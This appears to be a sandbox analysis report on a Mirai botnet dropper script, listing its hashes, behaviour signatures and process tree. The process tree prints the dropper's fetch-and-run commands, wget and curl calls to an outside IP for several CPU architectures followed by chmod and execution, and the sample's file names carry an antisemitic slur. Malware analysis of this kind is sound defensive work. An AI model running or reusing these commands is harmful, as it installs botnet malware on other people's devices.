Overview

overview

10

Static

static

1

jewn.sh

ubuntu-18.04-amd64

10

jewn.sh

debian-9-armhf

10

jewn.sh

debian-9-mips

10

jewn.sh

debian-9-mipsel

10

Analysis

  • max time kernel
    150s
  • max time network
    148s
  • platform
    debian-9_mips
  • resource
    debian9-mipsbe-20240729-en
  • resource tags

    arch:mipsimage:debian9-mipsbe-20240729-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem
  • submitted
    06/12/2024, 13:19

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    jewn.sh

  • Size

    1KB

  • MD5

    49377a7c5220a2e428c4ff6898fcd50c

  • SHA1

    0d2843613a97cc150c539474b2db2ff741260997

  • SHA256

    336fc216d10d88ac069d22db53159229050040ff570e610ddcca11040e666a4c

  • SHA512

    51189375074dc361c0b855ae89774e7888a0a3360bd8291f2d99ba2bc8de4cdf8a2307044d8aee9d9459973f2e29b5d866b7b004e7df754688324a207d77b342

Score
10/10
miraikurcbotnetdefense_evasiondiscovery

Malware Config

Extracted

Family

mirai

Botnet

KURC

Extracted

Family

mirai

Botnet

KURC

Signatures

  • Mirai

    Mirai is a prevalent Linux malware infecting exposed network devices.

    botnetmirai
  • Mirai family
    mirai
  • Contacts a large (112273) amount of remote hosts 1 TTPs

    This may indicate a network scan to discover remotely running services.

    discovery
  • Creates a large amount of network flows 1 TTPs

    This may indicate a network scan to discover remotely running services.

    discovery
  • File and Directory Permissions Modification 1 TTPs 9 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

    defense_evasion
  • Executes dropped EXE 9 IoCs
  • Modifies Watchdog functionality 1 TTPs 16 IoCs

    Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.

    defense_evasion
  • Enumerates active TCP sockets 1 TTPs 7 IoCs

    Gets active TCP sockets from /proc virtual filesystem.

    discovery
  • Writes file to system bin folder 16 IoCs
  • Changes its process name 8 IoCs
  • Reads system network configuration 1 TTPs 7 IoCs

    Uses contents of /proc filesystem to enumerate network settings.

    discovery
  • Reads runtime system information 64 IoCs

    Reads data from /proc virtual filesystem.

    discovery
  • System Network Configuration Discovery 1 TTPs 3 IoCs

    Adversaries may gather information about the network configuration of a system.

    discovery
  • Writes file to tmp directory 20 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/jewn.sh
    /tmp/jewn.sh
    1⤵
    • Writes file to tmp directory
    PID:715
    • /usr/bin/wget
      wget http://93.123.85.78/bins/jew.x86
      2⤵
      • Writes file to tmp directory
      PID:718
    • /usr/bin/curl
      curl -O http://93.123.85.78/bins/jew.x86
      2⤵
      • Reads runtime system information
      • Writes file to tmp directory
      PID:733
    • /bin/cat
      cat jew.x86
      2⤵
        PID:743
      • /bin/chmod
        chmod +x jewn jewn.sh jew.x86 systemd-private-62296eb1a0ad45a38bb7146d93baeaea-systemd-timedated.service-9R0n4H
        2⤵
        • File and Directory Permissions Modification
        PID:744
      • /tmp/jewn
        ./jewn
        2⤵
        • Executes dropped EXE
        PID:745
      • /usr/bin/wget
        wget http://93.123.85.78/bins/jew.mips
        2⤵
        • System Network Configuration Discovery
        • Writes file to tmp directory
        PID:747
      • /usr/bin/curl
        curl -O http://93.123.85.78/bins/jew.mips
        2⤵
        • System Network Configuration Discovery
        • Writes file to tmp directory
        PID:749
      • /bin/cat
        cat jew.mips
        2⤵
        • System Network Configuration Discovery
        PID:750
      • /bin/chmod
        chmod +x jew.mips jewn jewn.sh jew.x86 systemd-private-62296eb1a0ad45a38bb7146d93baeaea-systemd-timedated.service-9R0n4H
        2⤵
        • File and Directory Permissions Modification
        PID:751
      • /tmp/jewn
        ./jewn
        2⤵
        • Executes dropped EXE
        • Modifies Watchdog functionality
        • Writes file to system bin folder
        • Changes its process name
        PID:752
      • /usr/bin/wget
        wget http://93.123.85.78/bins/jew.mpsl
        2⤵
        • Writes file to tmp directory
        PID:757
      • /usr/bin/curl
        curl -O http://93.123.85.78/bins/jew.mpsl
        2⤵
        • Writes file to tmp directory
        PID:758
      • /bin/chmod
        chmod +x jew.mips jew.mpsl jewn jewn.sh jew.x86 systemd-private-62296eb1a0ad45a38bb7146d93baeaea-systemd-timedated.service-9R0n4H
        2⤵
        • File and Directory Permissions Modification
        PID:760
      • /tmp/jewn
        ./jewn
        2⤵
        • Executes dropped EXE
        • Modifies Watchdog functionality
        • Enumerates active TCP sockets
        • Writes file to system bin folder
        • Changes its process name
        • Reads system network configuration
        • Reads runtime system information
        PID:761
      • /usr/bin/wget
        wget http://93.123.85.78/bins/jew.arm4
        2⤵
          PID:841
        • /usr/bin/curl
          curl -O http://93.123.85.78/bins/jew.arm4
          2⤵
          • Writes file to tmp directory
          PID:842
        • /bin/chmod
          chmod +x jew.arm4 jew.mips jew.mpsl jewn jewn.sh jew.x86 systemd-private-62296eb1a0ad45a38bb7146d93baeaea-systemd-timedated.service-9R0n4H
          2⤵
          • File and Directory Permissions Modification
          PID:844
        • /tmp/jewn
          ./jewn
          2⤵
          • Executes dropped EXE
          • Modifies Watchdog functionality
          • Enumerates active TCP sockets
          • Writes file to system bin folder
          • Changes its process name
          • Reads system network configuration
          • Reads runtime system information
          PID:845
        • /usr/bin/wget
          wget http://93.123.85.78/bins/jew.arm5
          2⤵
          • Writes file to tmp directory
          PID:851
        • /usr/bin/curl
          curl -O http://93.123.85.78/bins/jew.arm5
          2⤵
          • Reads runtime system information
          • Writes file to tmp directory
          PID:854
        • /bin/chmod
          chmod +x jew.arm4 jew.arm5 jew.mips jew.mpsl jewn jewn.sh jew.x86
          2⤵
          • File and Directory Permissions Modification
          PID:856
        • /tmp/jewn
          ./jewn
          2⤵
          • Executes dropped EXE
          • Modifies Watchdog functionality
          • Enumerates active TCP sockets
          • Writes file to system bin folder
          • Changes its process name
          • Reads system network configuration
          • Reads runtime system information
          PID:857
        • /usr/bin/wget
          wget http://93.123.85.78/bins/jew.arm6
          2⤵
          • Writes file to tmp directory
          PID:860
        • /usr/bin/curl
          curl -O http://93.123.85.78/bins/jew.arm6
          2⤵
          • Writes file to tmp directory
          PID:863
        • /bin/chmod
          chmod +x jew.arm4 jew.arm5 jew.arm6 jew.mips jew.mpsl jewn jewn.sh jew.x86
          2⤵
          • File and Directory Permissions Modification
          PID:865
        • /tmp/jewn
          ./jewn
          2⤵
          • Executes dropped EXE
          • Modifies Watchdog functionality
          • Enumerates active TCP sockets
          • Writes file to system bin folder
          • Changes its process name
          • Reads system network configuration
          • Reads runtime system information
          PID:866
        • /usr/bin/wget
          wget http://93.123.85.78/bins/jew.arm7
          2⤵
          • Writes file to tmp directory
          PID:869
        • /usr/bin/curl
          curl -O http://93.123.85.78/bins/jew.arm7
          2⤵
          • Writes file to tmp directory
          PID:872
        • /bin/chmod
          chmod +x jew.arm4 jew.arm5 jew.arm6 jew.arm7 jew.mips jew.mpsl jewn jewn.sh jew.x86
          2⤵
          • File and Directory Permissions Modification
          PID:874
        • /tmp/jewn
          ./jewn
          2⤵
          • Executes dropped EXE
          • Modifies Watchdog functionality
          • Enumerates active TCP sockets
          • Writes file to system bin folder
          • Changes its process name
          • Reads system network configuration
          • Reads runtime system information
          PID:875
        • /usr/bin/wget
          wget http://93.123.85.78/bins/jew.ppc
          2⤵
          • Writes file to tmp directory
          PID:878
        • /usr/bin/curl
          curl -O http://93.123.85.78/bins/jew.ppc
          2⤵
          • Writes file to tmp directory
          PID:881
        • /bin/chmod
          chmod +x jew.arm4 jew.arm5 jew.arm6 jew.arm7 jew.mips jew.mpsl jewn jewn.sh jew.ppc jew.x86
          2⤵
          • File and Directory Permissions Modification
          PID:883
        • /tmp/jewn
          ./jewn
          2⤵
          • Executes dropped EXE
          • Modifies Watchdog functionality
          • Enumerates active TCP sockets
          • Writes file to system bin folder
          • Changes its process name
          • Reads system network configuration
          • Reads runtime system information
          PID:884
        • /usr/bin/wget
          wget http://93.123.85.78/bins/jew.m68k
          2⤵
          • Writes file to tmp directory
          PID:887
        • /usr/bin/curl
          curl -O http://93.123.85.78/bins/jew.m68k
          2⤵
          • Writes file to tmp directory
          PID:890
        • /bin/chmod
          chmod +x jew.arm4 jew.arm5 jew.arm6 jew.arm7 jew.m68k jew.mips jew.mpsl jewn jewn.sh jew.ppc jew.x86
          2⤵
          • File and Directory Permissions Modification
          PID:892
        • /tmp/jewn
          ./jewn
          2⤵
          • Executes dropped EXE
          • Modifies Watchdog functionality
          • Enumerates active TCP sockets
          • Writes file to system bin folder
          • Changes its process name
          • Reads system network configuration
          • Reads runtime system information
          PID:893
        • /usr/bin/wget
          wget http://93.123.85.78/bins/jew.sh4
          2⤵
          • Writes file to tmp directory
          PID:896
        • /usr/bin/curl
          curl -O http://93.123.85.78/bins/jew.sh4
          2⤵
          • Writes file to tmp directory
          PID:899

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • /tmp/jewn
        Filesize

        60KB

        MD5

        ec9bf54e29277d9028ea800cf3cf7501

        SHA1

        371485bf2f9f86e25e618fcb98071b3f6c8524a8

        SHA256

        19385e38460e0a288e81bdcbb75e7ad23f747d5163ba276ec996bc53db3a11d2

        SHA512

        87e2fd37cead67b3e43a9b18c0c43b702ba6ecee6d1de3be60d7bf778218c872b417a693205172a2c4ad368c9ffdfe5f7dcd6ff6a0868ad946dbe5cc9e727da9

        Download Submit

      • /tmp/jewn
        Filesize

        125KB

        MD5

        c5ac3c0d137d7a994fb24f0d05335848

        SHA1

        1aca371b36bf8170bdc06e7014a5aef1c89ac0d9

        SHA256

        bd1585f0afe62dc9966151ce8f722958b21846e3a164dad19cf266a14bb5075d

        SHA512

        2dd5eedb9f9e1967db8a8025435f4bd9781592342e27ee66dd64c3ed63ec688b83adaff3995cece7f59c7acb68d93bcd2fbbdce35b94e318b9a955cb0dd64c80

        Download Submit